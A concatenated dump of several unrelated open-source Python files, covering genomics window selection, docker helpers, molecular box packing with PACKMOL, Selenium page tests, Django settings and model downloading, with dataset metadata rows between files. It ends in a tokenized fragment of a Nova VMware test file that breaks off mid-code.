# POSSIBILITY OF SUCH DAMAGE.
"""Determine genomic ranges to perform local assembly."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from third_party.nucleus.protos import reads_pb2
from third_party.nucleus.util import ranges
from deepvariant.protos import deepvariant_pb2
from deepvariant.protos import realigner_pb2
from deepvariant.python import allelecounter
from deepvariant.realigner.python import window_selector as cpp_window_selector
def _candidates_from_reads(config, ref_reader, reads, region):
"""Returns a list of candidate positions.
Args:
config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
options determining the behavior of this window selector.
ref_reader: GenomeReference. Indexed reference genome to query bases.
reads: list[nucleus.protos.Read]. The reads we are processing into
candidate positions.
region: nucleus.protos.Range. The region we are processing.
Returns:
A list. The elements are reference positions within region.
Raises:
ValueError: if config.window_selector_model.model_type isn't a valid enum
name in realigner_pb2.WindowSelectorModel.ModelType.
"""
allele_counter_options = deepvariant_pb2.AlleleCounterOptions(
read_requirements=reads_pb2.ReadRequirements(
min_mapping_quality=config.min_mapq,
min_base_quality=config.min_base_quality))
expanded_region = ranges.expand(
region,
config.region_expansion_in_bp,
contig_map=ranges.contigs_dict(ref_reader.header.contigs))
allele_counter = allelecounter.AlleleCounter(
ref_reader.c_reader, expanded_region, allele_counter_options)
for read in reads:
allele_counter.add(read)
model_type = config.window_selector_model.model_type
if model_type == realigner_pb2.WindowSelectorModel.VARIANT_READS:
return _variant_reads_threshold_selector(
allele_counter, config.window_selector_model.variant_reads_model,
region, expanded_region)
elif model_type == realigner_pb2.WindowSelectorModel.ALLELE_COUNT_LINEAR:
return _allele_count_linear_selector(
allele_counter, config.window_selector_model.allele_count_linear_model,
region, expanded_region)
else:
raise ValueError('Unknown enum option "{}" for '
'WindowSelectorModel.model_type'
.format(config.window_selector_model.model_type))
def _variant_reads_threshold_selector(allele_counter, model_conf, region,
expanded_region):
"""Returns a list of candidate positions.
Following cigar operations generate candidate position:
- ALIGNMENT_MATCH, SEQUENCE_MISMATCH, SEQUENCE_MATCH: at mismatch positions
in the read when compared to the reference sequence.
- DELETE: at positions within [cigar_start, cigar_start + cigar_len)
- INSERT, CLIP_SOFT: at positions within
[cigar_start - cigar_len, cigar_start + cigar_len)
Args:
allele_counter: learning.genomics.deepvariant.realigner.AlleleCounter in the
considered region.
model_conf: learning.genomics.deepvariant.realigner
.WindowSelectorOptions.VariantReadsThresholdModel
options determining the behavior of this window selector.
region: nucleus.protos.Range. The region we are processing.
expanded_region: nucleus.protos.Range. The region we are processing.
Returns:
A list. The elements are reference positions within region.
"""
counts_vec = cpp_window_selector.variant_reads_candidates_from_allele_counter(
allele_counter)
return [
expanded_region.start + i
for i, count in enumerate(counts_vec)
if (count >= model_conf.min_num_supporting_reads and count <=
model_conf.max_num_supporting_reads and ranges.position_overlaps(
region.reference_name, expanded_region.start + i, region))
]
def _allele_count_linear_selector(allele_counter, model_conf, region,
expanded_region):
"""Returns a list of candidate positions.
Candidate positions for realignment are generated by scoring each location.
The score at a location is a weighted sum of the number of reads with each
CIGAR operation at the location, where the weights are determined by the model
coefficients. Locations whose score exceed the model decision boundary value
are used to create realignment windows.
Args:
allele_counter: learning.genomics.deepvariant.realigner.AlleleCounter in the
considered region.
model_conf: learning.genomics.deepvariant.realigner
.WindowSelectorOptions.AlleleCountLinearModel
options determining the behavior of this window selector.
region: nucleus.protos.Range. The region we are processing.
expanded_region: nucleus.protos.Range. The region we are processing.
Returns:
A list. The elements are reference positions within region.
"""
scores_vec = (
cpp_window_selector.allele_count_linear_candidates_from_allele_counter(
allele_counter, model_conf))
return [
expanded_region.start + i
for i, score in enumerate(scores_vec)
if score > model_conf.decision_boundary and ranges.position_overlaps(
region.reference_name, expanded_region.start + i, region)
]
def _candidates_to_windows(config, candidate_pos, ref_name):
""""Process candidate positions to determine windows for local assembly.
Windows are within range of
[min(pos) - config.min_windows_distance,
max(pos) + config.min_windows_distance)
Args:
config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
options determining the behavior of this window selector.
candidate_pos: A list of ref_pos.
ref_name: Reference name, used in setting the output
genomics.range.reference_name value.
Returns:
A sorted list of nucleus.protos.Range protos for all windows in this region.
"""
windows = []
def _add_window(start_pos, end_pos):
windows.append(
ranges.make_range(ref_name, start_pos - config.min_windows_distance,
end_pos + config.min_windows_distance))
start_pos, end_pos = None, None
for pos in sorted(candidate_pos):
if start_pos is None:
start_pos = pos
end_pos = pos
# We need to check if the previous end_pos is within 2*window_distance as we
# generate a window of radius window_distance around each position.
#
# <-------end_pos------->
# <-------pos------->
# where window_distance = ------->
#
# If this is the case, we need to merge the two windows.
elif pos > end_pos + 2 * config.min_windows_distance:
_add_window(start_pos, end_pos)
start_pos = pos
end_pos = pos
else:
end_pos = pos
if start_pos is not None:
_add_window(start_pos, end_pos)
return sorted(windows, key=ranges.as_tuple)
def select_windows(config, ref_reader, reads, region):
""""Process reads to determine candidate windows for local assembly.
Windows are within range of
[0 - config.min_windows_distance, ref_len + config.min_windows_distance)
Args:
config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
options determining the behavior of this window selector.
ref_reader: GenomeReference. Indexed reference genome to query bases.
reads: A list of genomics.Read records.
region: nucleus.protos.Range. The region we are processing.
Returns:
A list of nucleus.protos.Range protos sorted by their genomic position.
"""
# This is a fast path for the case where we have no reads, so we have no
# windows to assemble.
if not reads:
return []
candidates = _candidates_from_reads(config, ref_reader, reads, region)
return _candidates_to_windows(config, candidates, region.reference_name)
| 40.141026 | 80 | 0.748749 |
b909e58a149f3245964dec6232a03c9850a25dc4 | 1,371 | py | Python | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | import time
import jsonpickle
import python_on_whales
import requests
def start_docker_container(
image: str, port_id: int, sleep_time=5
) -> python_on_whales.Container:
"""Start docker container given the image name and port number.
Args
----
image: docker image name
port_id: port id
sleep_time: warmup time
Returns
-------
container: a docker container object.
"""
print(f"starting a docker container ... {image}")
container = python_on_whales.docker.run(
image=image, detach=True, publish=[(port_id, port_id)]
)
time.sleep(sleep_time)
return container
def kill_container(container: python_on_whales.Container) -> None:
"""Kill docker container.
Args
----
container: a docker container object.
"""
print(f"killing {container} ...")
container.kill()
def recognize_emotion(utterance: str, url_erc: str = "http://127.0.0.1:10006") -> str:
"""Recognize the speaker emotion of a given utterance.
Args
----
utterance:
url_erc: the url of the emoberta api server.
Returns
-------
emotion
"""
data = {"text": utterance}
data = jsonpickle.encode(data)
response = requests.post(url_erc, json=data)
response = jsonpickle.decode(response.text)
emotion = max(response, key=response.get)
return emotion
| 20.462687 | 86 | 0.653538 |
dd0e51ca1d2e1c4d2b9f2fa0e78f3335360803c1 | 6,889 | py | Python | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | null | null | null | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | 30 | 2021-11-02T12:47:24.000Z | 2022-03-01T22:00:39.000Z | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | null | null | null | import errno
import logging
import os
import shutil
import subprocess
from functools import reduce
from typing import List, Tuple
import numpy
from openff.toolkit.topology import Molecule, Topology
from openff.utilities import temporary_cd
from openmm import unit
_logger = logging.getLogger(__name__)
class PACKMOLRuntimeError(RuntimeError):
"""An error raised when PACKMOL fails to execute / converge for some reason."""
class PACKMOLCoordinateFactory:
"""A factory for generating boxes of molecule coordinates using PACKMOL."""
@classmethod
def _approximate_box_size_by_density(
cls,
components: List[Tuple[str, int]],
target_density: unit.Quantity,
scale_factor: float = 1.1,
) -> unit.Quantity:
"""Generate an approximate box size based on the number and molecular weight of
the molecules present, and a target density for the final system.
Args:
components: A list of the form ``components[i] = (smiles_i, count_i)`` where
``smiles_i`` is the SMILES representation of component `i` and
``count_i`` is the number of corresponding instances of that component
to create.
target_density: Target mass density for final system with units compatible
with g / mL.
If ``None``, ``box_size`` must be provided.
scale_factor: The amount to scale the box size by.
Returns:
The box size.
"""
molecules = {
smiles: Molecule.from_smiles(smiles)
for smiles in {smiles for smiles, _ in components}
}
volume = 0.0 * unit.angstrom ** 3
for smiles, count in components:
molecule_mass = (
reduce(
(lambda x, y: x + y),
[atom.mass for atom in molecules[smiles].atoms],
)
/ unit.AVOGADRO_CONSTANT_NA
)
molecule_volume = molecule_mass / target_density
volume += molecule_volume * count
return volume ** (1.0 / 3.0) * scale_factor
@classmethod
def _build_input_file(
cls,
components: List[Tuple[str, int]],
box_size: unit.Quantity,
tolerance: unit.Quantity,
) -> str:
"""Construct the PACKMOL input file.
Args:
components: A list of tuples containing the file path to an XYZ file and
the number of times to include that component in the final system.
box_size: The size of the box to pack the components into.
tolerance: The PACKMOL convergence tolerance.
Returns:
The string contents of the PACKMOL input file.
"""
box_size = box_size.value_in_unit(unit.angstrom)
tolerance = tolerance.value_in_unit(unit.angstrom)
seed = os.getenv("ABSOLV_PACKMOL_SEED")
return "\n".join(
[
f"tolerance {tolerance:f}",
"filetype xyz",
"output output.xyz",
*([] if seed is None else [f"seed {seed}"]),
"",
*[
f"structure {file_name}\n"
f" number {count}\n"
f" inside box 0. 0. 0. {box_size} {box_size} {box_size}\n"
"end structure\n"
""
for file_name, count in components
],
]
)
@classmethod
def generate(
cls,
components: List[Tuple[str, int]],
target_density: unit.Quantity = 0.95 * unit.grams / unit.milliliters,
tolerance: unit.Quantity = 2.0 * unit.angstrom,
) -> Tuple[Topology, unit.Quantity]:
"""Generate a set of molecule coordinate by using the PACKMOL package.
Args:
components: A list of the form ``components[i] = (smiles_i, count_i)`` where
``smiles_i`` is the SMILES representation of component `i` and
``count_i`` is the number of corresponding instances of that component
to create.
target_density: Target mass density for final system with units compatible
with g / mL.
If ``None``, ``box_size`` must be provided.
tolerance: The minimum spacing between molecules during packing in units
compatible with angstroms.
Raises:
* PACKMOLRuntimeError
Returns:
A topology containing the molecules the coordinates were generated for and
a unit [A] wrapped numpy array of coordinates with shape=(n_atoms, 3).
"""
packmol_path = shutil.which("packmol")
if packmol_path is None:
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), "packmol")
box_size = cls._approximate_box_size_by_density(components, target_density)
molecules = {}
for smiles, _ in components:
if smiles in molecules:
continue
molecule: Molecule = Molecule.from_smiles(smiles)
molecule.generate_conformers(n_conformers=1)
molecule.name = f"component-{len(molecules)}.xyz"
molecules[smiles] = molecule
with temporary_cd():
for molecule in molecules.values():
molecule.to_file(molecule.name, "xyz")
input_file_contents = cls._build_input_file(
[(molecules[smiles].name, count) for smiles, count in components],
box_size,
tolerance,
)
with open("input.txt", "w") as file:
file.write(input_file_contents)
with open("input.txt") as file:
result = subprocess.check_output(
packmol_path, stdin=file, stderr=subprocess.STDOUT
).decode("utf-8")
if not result.find("Success!") > 0:
raise PACKMOLRuntimeError(result)
with open("output.xyz") as file:
output_lines = file.read().splitlines(False)
coordinates = (
numpy.array(
[
[float(coordinate) for coordinate in coordinate_line.split()[1:]]
for coordinate_line in output_lines[2:]
if len(coordinate_line) > 0
]
)
* unit.angstrom
)
# Add a 2 angstrom buffer to help alleviate PBC issues.
box_vectors = numpy.eye(3) * (box_size.value_in_unit(unit.angstrom) + 2.0)
topology = Topology.from_molecules(
[molecules[smiles] for smiles, count in components for _ in range(count)]
)
topology.box_vectors = box_vectors * unit.angstrom
return topology, coordinates
| 33.604878 | 88 | 0.573378 |
e76209f764a4aa77a0bf6171e360d1f6d132e8e7 | 266 | py | Python | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | 1 | 2022-01-12T11:20:22.000Z | 2022-01-12T11:20:22.000Z | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | null | null | null | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | 2 | 2021-05-07T08:01:13.000Z | 2021-08-14T22:24:33.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2021, libracore AG and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class NothingSettings(Document):
pass
| 24.181818 | 51 | 0.778195 |
974a75d62b602afb36f86a2e0e116d09f8aa1ba2 | 1,994 | py | Python | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | import pytest
from .pages.main_page import MainPage
from .pages.login_page import LoginPage
from .pages.basket_page import BasketPage
links = [
"http://selenium1py.pythonanywhere.com/",
# link = "http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer"
]
# task 4.3.11
# Группировка тестов: setup
@pytest.mark.login_guest
@pytest.mark.parametrize("link", links)
class TestLoginFromMainPage():
@pytest.fixture(scope="function", autouse=True)
def setup(self, browser, link):
self.link = link
self.browser = browser
def test_guest_can_go_to_login_page(self):
# инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page = MainPage(self.browser, self.link)
page.open() # открываем страницу
# проверяем, если ли линка на форму логина
page.should_be_login_link()
# выполняем метод страницы — переходим на страницу логина
page.go_to_login_page()
login_page = LoginPage(self.browser, self.browser.current_url)
login_page.should_be_login_page()
def test_guest_should_see_login_link(self):
page = MainPage(self.browser, self.link)
page.open()
page.should_be_login_link()
# task 4.3.10
# Задание: наследование и отрицательные проверки
@pytest.mark.parametrize("link", links)
def test_guest_cant_see_product_in_basket_opened_from_main_page(browser, link):
# инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page = MainPage(browser, link)
page.open() # открываем страницу
page.should_be_basket_page_link()
page.go_to_basket_page() # переходим в корзину
basket_page = BasketPage(browser, browser.current_url)
# проверяем что есть сообщение о том, что корзина пуста
basket_page.should_be_empty_basket_message()
# проверяем что корзина пуста
basket_page.should_be_empty_basket()
| 37.622642 | 107 | 0.717653 |
ea08e4d8223db78d60009129f5b76b6d511b69d5 | 959 | py | Python | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | 4 | 2017-10-24T14:52:44.000Z | 2018-03-16T07:15:13.000Z | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | null | null | null | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | null | null | null | import networkx as nx
import shapely
import csv
import random
#import an adjacency graph exported from QGIS & create a networkx graph
def read_file(file):
with open(file, 'r') as f:
reader = csv.reader(f, delimiter=',')
reader.next() #skip header
results = [row for row in reader]
return results
def build_graph():
#from the adjacency data, build the graph -- assume each row of CSV is a pair of node IDs which are connected by an edge
#and population data are contained within the 3rd and 4th fields
data = read_file('MN-sample-area/mcd2010-graph.csv')
nodes = set([x[0] for x in data])
edges = [(x[0],x[2]) for x in data if x[2]!='']
G = nx.Graph()
G.add_nodes_from(nodes)
G.add_edges_from(edges)
#link the population data as weights
weights = [(x[3],x[9]) for x in read_file('MN-sample-area/weights.csv')]
for weight in weights:
G.nodes[weight[0]]['weight']=weight[1]
return G
if __name__ == "__main__":
G = build_graph() | 24.589744 | 121 | 0.701773 |
090d03b91140c6be6713db6c01acfb9d99b96339 | 426 | py | Python | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | from crowdhub.settings.base import *
from crowdhub.settings.auth import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crowdhub',
'USER': 'root',
'PASSWORD': 'password',
'HOST': 'localhost',
}
}
# Setup mongo connection
MONGO_DATABASE_NAME = 'crowdhub_data'
from mongoengine import connect
DEFAULT_CONNECTION_NAME = connect(MONGO_DATABASE_NAME)
| 20.285714 | 54 | 0.659624 |
9e64675fe3ecfa4c96bc82604676d085e2021abf | 2,293 | py | Python | core/models/model_store.py | chenfangchenf/awesome-semantic-segmentation-pytorch | 7fb5718d9c8d606aba520a24655b2f244821b7dc | [
"Apache-2.0"
] | 2,254 | 2019-03-19T12:25:34.000Z | 2022-03-31T07:28:51.000Z | core/models/model_store.py | omarsayed7/awesome-semantic-segmentation-pytorch | 7fbe397a9add570fe1ebee8654898f2b3ba1942f | [
"Apache-2.0"
] | 179 | 2019-03-21T06:00:25.000Z | 2022-03-29T04:02:27.000Z | core/models/model_store.py | omarsayed7/awesome-semantic-segmentation-pytorch | 7fbe397a9add570fe1ebee8654898f2b3ba1942f | [
"Apache-2.0"
] | 552 | 2019-04-23T08:09:56.000Z | 2022-03-29T15:21:29.000Z | """Model store which provides pretrained models."""
from __future__ import print_function
import os
import zipfile
from ..utils.download import download, check_sha1
__all__ = ['get_model_file', 'get_resnet_file']
_model_sha1 = {name: checksum for checksum, name in [
('25c4b50959ef024fcc050213a06b614899f94b3d', 'resnet50'),
('2a57e44de9c853fa015b172309a1ee7e2d0e4e2a', 'resnet101'),
('0d43d698c66aceaa2bc0309f55efdd7ff4b143af', 'resnet152'),
]}
encoding_repo_url = 'https://hangzh.s3.amazonaws.com/'
_url_format = '{repo_url}encoding/models/{file_name}.zip'
def short_hash(name):
if name not in _model_sha1:
raise ValueError('Pretrained model for {name} is not available.'.format(name=name))
return _model_sha1[name][:8]
def get_resnet_file(name, root='~/.torch/models'):
file_name = '{name}-{short_hash}'.format(name=name, short_hash=short_hash(name))
root = os.path.expanduser(root)
file_path = os.path.join(root, file_name + '.pth')
sha1_hash = _model_sha1[name]
if os.path.exists(file_path):
if check_sha1(file_path, sha1_hash):
return file_path
else:
print('Mismatch in the content of model file {} detected.' +
' Downloading again.'.format(file_path))
else:
print('Model file {} is not found. Downloading.'.format(file_path))
if not os.path.exists(root):
os.makedirs(root)
zip_file_path = os.path.join(root, file_name + '.zip')
repo_url = os.environ.get('ENCODING_REPO', encoding_repo_url)
if repo_url[-1] != '/':
repo_url = repo_url + '/'
download(_url_format.format(repo_url=repo_url, file_name=file_name),
path=zip_file_path,
overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(root)
os.remove(zip_file_path)
if check_sha1(file_path, sha1_hash):
return file_path
else:
raise ValueError('Downloaded file has different hash. Please try again.')
def get_model_file(name, root='~/.torch/models'):
root = os.path.expanduser(root)
file_path = os.path.join(root, name + '.pth')
if os.path.exists(file_path):
return file_path
else:
raise ValueError('Model file is not found. Downloading or trainning.')
| 33.231884 | 91 | 0.680331 |
10ffa37b1e3099f05f0dd08e9c4c40835d8ed3df | 576 | py | Python | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 7 | 2021-12-12T09:14:50.000Z | 2022-02-06T15:59:57.000Z | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 5 | 2021-12-13T20:27:13.000Z | 2021-12-14T08:31:11.000Z | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 1 | 2021-12-31T18:52:41.000Z | 2021-12-31T18:52:41.000Z | from typing import Any
from essentials.exceptions import AcceptedException
class ConflictError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class PreconfitionFailed(Exception):
def __init__(
self,
message: str = "The resource has been modified since it was read.",
) -> None:
super().__init__(message)
class AcceptedExceptionWithData(AcceptedException):
def __init__(self, message: str = "Accepted", data: Any = None):
super().__init__(message=message)
self.data = data
| 25.043478 | 75 | 0.682292 |
1f88edcc2d15b945e54fe86a8104cfabdb3e6e01 | 170,718 | py | Python | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.'
nl|'\n'
comment|'# Copyright 2013 Canonical Corp.'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'collections'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'uuidutils'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
op|'.'
name|'objects'
name|'import'
name|'datastore'
name|'as'
name|'ds_obj'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'pbm'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
name|'as'
name|'vutil'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'network'
name|'import'
name|'model'
name|'as'
name|'network_model'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'stubs'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'constants'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'driver'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vm_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|partialObject
name|'class'
name|'partialObject'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
name|'path'
op|'='
string|"'fake-path'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'path'
op|'='
name|'path'
newline|'\n'
name|'self'
op|'.'
name|'fault'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VMwareVMUtilTestCase
dedent|''
dedent|''
name|'class'
name|'VMwareVMUtilTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVMUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
name|'stubs'
op|'.'
name|'set_stubs'
op|'('
name|'self'
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'vm_refs_cache_reset'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_instance'
op|'='
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'None'
op|','
nl|'\n'
op|'**'
op|'{'
string|"'id'"
op|':'
number|'7'
op|','
string|"'name'"
op|':'
string|"'fake!'"
op|','
nl|'\n'
string|"'display_name'"
op|':'
string|"'fake-display-name'"
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
op|','
nl|'\n'
string|"'vcpus'"
op|':'
number|'2'
op|','
string|"'memory_mb'"
op|':'
number|'2048'
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_get_stats_from_cluster
dedent|''
name|'def'
name|'_test_get_stats_from_cluster'
op|'('
name|'self'
op|','
name|'connection_state'
op|'='
string|'"connected"'
op|','
nl|'\n'
name|'maintenance_mode'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ManagedObjectRefs'
op|'='
op|'['
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"host1"'
op|','
nl|'\n'
string|'"HostSystem"'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"host2"'
op|','
nl|'\n'
string|'"HostSystem"'
op|')'
op|']'
newline|'\n'
name|'hosts'
op|'='
name|'fake'
op|'.'
name|'_convert_to_array_of_mor'
op|'('
name|'ManagedObjectRefs'
op|')'
newline|'\n'
name|'respool'
op|'='
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"resgroup-11"'
op|','
string|'"ResourcePool"'
op|')'
newline|'\n'
name|'prop_dict'
op|'='
op|'{'
string|"'host'"
op|':'
name|'hosts'
op|','
string|"'resourcePool'"
op|':'
name|'respool'
op|'}'
newline|'\n'
nl|'\n'
name|'hardware'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'hardware'
op|'.'
name|'numCpuCores'
op|'='
number|'8'
newline|'\n'
name|'hardware'
op|'.'
name|'numCpuThreads'
op|'='
number|'16'
newline|'\n'
name|'hardware'
op|'.'
name|'vendor'
op|'='
string|'"Intel"'
newline|'\n'
name|'hardware'
op|'.'
name|'cpuModel'
op|'='
string|'"Intel(R) Xeon(R)"'
newline|'\n'
nl|'\n'
name|'runtime_host_1'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'runtime_host_1'
op|'.'
name|'connectionState'
op|'='
string|'"connected"'
newline|'\n'
name|'runtime_host_1'
op|'.'
name|'inMaintenanceMode'
op|'='
name|'False'
newline|'\n'
nl|'\n'
name|'runtime_host_2'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'runtime_host_2'
op|'.'
name|'connectionState'
op|'='
name|'connection_state'
newline|'\n'
name|'runtime_host_2'
op|'.'
name|'inMaintenanceMode'
op|'='
name|'maintenance_mode'
newline|'\n'
nl|'\n'
name|'prop_list_host_1'
op|'='
op|'['
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"hardware_summary"'
op|','
name|'val'
op|'='
name|'hardware'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"runtime_summary"'
op|','
nl|'\n'
name|'val'
op|'='
name|'runtime_host_1'
op|')'
op|']'
newline|'\n'
name|'prop_list_host_2'
op|'='
op|'['
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"hardware_summary"'
op|','
name|'val'
op|'='
name|'hardware'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'Prop'
op|'('
name|'name'
op|'='
string|'"runtime_summary"'
op|','
nl|'\n'
name|'val'
op|'='
name|'runtime_host_2'
op|')'
op|']'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'ObjectContent'
op|'('
string|'"prop_list_host1"'
op|','
nl|'\n'
name|'prop_list_host_1'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'ObjectContent'
